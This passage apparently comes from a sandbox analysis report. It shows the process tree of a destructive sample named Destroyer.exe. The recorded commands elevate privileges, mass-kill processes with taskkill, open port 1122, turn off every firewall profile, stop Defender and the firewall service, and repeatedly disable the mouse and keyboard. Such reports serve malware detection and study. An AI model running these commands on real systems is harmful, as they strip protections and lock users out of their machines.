- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process "C:\Users\Admin\AppData\Local\Temp\Destroyer.exe" -Verb RunAs -ArgumentList "am_admin"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:3644
  - - C:\Users\Admin\AppData\Local\Temp\Destroyer.exe
      "C:\Users\Admin\AppData\Local\Temp\Destroyer.exe" am_admin
      4⤵
      PID:1432
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\58FD.tmp\58FE.bat C:\Users\Admin\AppData\Local\Temp\Destroyer.exe am_admin"
        5⤵
        
        PID:3916
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist | findstr /r /b ".*.exe"
        6⤵
        
        PID:4848
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:4544
        
        C:\Windows\system32\findstr.exe
        
        findstr /r /b ".*.exe"
        7⤵
        
        PID:1572
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "356"
        6⤵
        Kills process with taskkill
        
        PID:2400
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "444"
        6⤵
        Kills process with taskkill
        
        PID:2596
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "520"
        6⤵
        
        PID:1944
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "528"
        6⤵
        
        PID:5048
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "612"
        6⤵
        Kills process with taskkill
        
        PID:2168
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "656"
        6⤵
        Kills process with taskkill
        
        PID:4964
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "784"
        6⤵
        Kills process with taskkill
        
        PID:3408
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "792"
        6⤵
        Kills process with taskkill
        
        PID:3176
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "800"
        6⤵
        
        PID:2468
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "904"
        6⤵
        Kills process with taskkill
        
        PID:3316
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "956"
        6⤵
        
        PID:4676
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "332"
        6⤵
        
        PID:4000
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "392"
        6⤵
        
        PID:5036
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1044"
        6⤵
        
        PID:2096
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1056"
        6⤵
        
        PID:536
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1064"
        6⤵
        
        PID:2428
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1072"
        6⤵
        
        PID:3036
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1212"
        6⤵
        
        PID:4836
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1232"
        6⤵
        
        PID:4644
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1296"
        6⤵
        
        PID:5108
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1308"
        6⤵
        Kills process with taskkill
        
        PID:3220
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1368"
        6⤵
        Kills process with taskkill
        
        PID:2120
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1460"
        6⤵
        
        PID:4368
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1472"
        6⤵
        Kills process with taskkill
        
        PID:1340
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1496"
        6⤵
        Kills process with taskkill
        
        PID:716
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1504"
        6⤵
        Kills process with taskkill
        
        PID:4720
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1640"
        6⤵
        Kills process with taskkill
        
        PID:3412
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1700"
        6⤵
        
        PID:4920
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1736"
        6⤵
        
        PID:4976
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1772"
        6⤵
        Kills process with taskkill
        
        PID:3808
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1920"
        6⤵
        Kills process with taskkill
        
        PID:1116
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1952"
        6⤵
        
        PID:1856
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2040"
        6⤵
        Kills process with taskkill
        
        PID:2868
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1040"
        6⤵
        Kills process with taskkill
        
        PID:2012
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1744"
        6⤵
        
        PID:2356
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1932"
        6⤵
        
        PID:4612
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2148"
        6⤵
        
        PID:3768
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2176"
        6⤵
        
        PID:1908
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2236"
        6⤵
        
        PID:2712
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2372"
        6⤵
        
        PID:116
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2492"
        6⤵
        Kills process with taskkill
        
        PID:1152
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2504"
        6⤵
        
        PID:4512
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2656"
        6⤵
        
        PID:752
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2684"
        6⤵
        
        PID:3444
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2748"
        6⤵
        Kills process with taskkill
        
        PID:2592
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2804"
        6⤵
        
        PID:3204
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2816"
        6⤵
        
        PID:4324
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2828"
        6⤵
        
        PID:3048
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2836"
        6⤵
        
        PID:1592
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2848"
        6⤵
        Kills process with taskkill
        
        PID:2960
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2988"
        6⤵
        Kills process with taskkill
        
        PID:4400
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2276"
        6⤵
        
        PID:1012
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "3252"
        6⤵
        
        PID:184
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "3452"
        6⤵
        
        PID:4876
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "3464"
        6⤵
        
        PID:3928
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "3652"
        6⤵
        
        PID:2672
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "3848"
        6⤵
        
        PID:412
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "4008"
        6⤵
        
        PID:1180
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "4092"
        6⤵
        
        PID:4024
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "3976"
        6⤵
        Kills process with taskkill
        
        PID:1192
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "4900"
        6⤵
        Kills process with taskkill
        
        PID:2628
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1864"
        6⤵
        
        PID:2316
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "548"
        6⤵
        
        PID:5044
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "808"
        6⤵
        Kills process with taskkill
        
        PID:1928
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1752"
        6⤵
        Kills process with taskkill
        
        PID:2324
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "4584"
        6⤵
        
        PID:4988
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1184"
        6⤵
        
        PID:2352
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "4844"
        6⤵
        
        PID:1984
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "4380"
        6⤵
        Kills process with taskkill
        
        PID:3152
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2908"
        6⤵
        
        PID:4412
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "4192"
        6⤵
        Kills process with taskkill
        
        PID:3908
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "4212"
        6⤵
        Kills process with taskkill
        
        PID:2348
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "3664"
        6⤵
        Kills process with taskkill
        
        PID:1288
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "3988"
        6⤵
        
        PID:1188
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "4100"
        6⤵
        
        PID:4684
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "756"
        6⤵
        Kills process with taskkill
        
        PID:512
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1588"
        6⤵
        
        PID:1756
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "4060"
        6⤵
        Kills process with taskkill
        
        PID:3524
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "2928"
        6⤵
        Kills process with taskkill
        
        PID:2260
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1432"
        6⤵
        
        PID:4372
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "4536"
        6⤵
        
        PID:624
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "3916"
        6⤵
        
        PID:2716
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "4848"
        6⤵
        Kills process with taskkill
        
        PID:4396
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "4544"
        6⤵
        
        PID:2844
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "1572"
        6⤵
        
        PID:1524
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Port 1122 TCP" dir=in action=allow protocol=TCP localport=1122
        6⤵
        Modifies Windows Firewall
        
        PID:4820
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Port 1122 UDP" dir=in action=allow protocol=UDP localport=1122
        6⤵
        Modifies Windows Firewall
        
        PID:4200
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile firewallpolicy blockinbound,allowoutbound
        6⤵
        Modifies Windows Firewall
        
        PID:4168
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        6⤵
        Modifies Windows Firewall
        
        PID:3112
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        6⤵
        Modifies Windows Firewall
        
        PID:4424
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        6⤵
        Modifies Windows Firewall
        
        PID:3440
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        6⤵
        Modifies Windows Firewall
        
        PID:2700
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        6⤵
        Modifies Windows Firewall
        
        PID:3144
      - C:\Windows\system32\net.exe
        
        net stop "Windows Defender Service"
        6⤵
        
        PID:2336
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Windows Defender Service"
        7⤵
        
        PID:4856
      - C:\Windows\system32\net.exe
        
        net stop "Windows Firewall"
        6⤵
        
        PID:2304
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Windows Firewall"
        7⤵
        
        PID:4052
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3668
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4784
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:3332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:3548
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4360
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:1756
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:3408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2428
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:3440
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4920
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4876
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4232
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:1912
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4992
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:3308
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:3140
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2100
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4888
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4352
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4656
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4964
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:5108
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4824
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:3048
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4956
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:1984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:2384
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:2540
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:3316
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Drops file in System32 directory
        
        PID:4780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:2476
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:4644
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:3644
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Drops file in System32 directory
        
        PID:1888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:3872
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:540
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:5048
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Drops file in System32 directory
        
        PID:3528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:4992
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:3992
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:3408
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:3912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:5084
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:3016
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:4956
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:4476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:540
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:1148
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3484
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:536
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2304
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1492
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3644
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:940
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
        6⤵
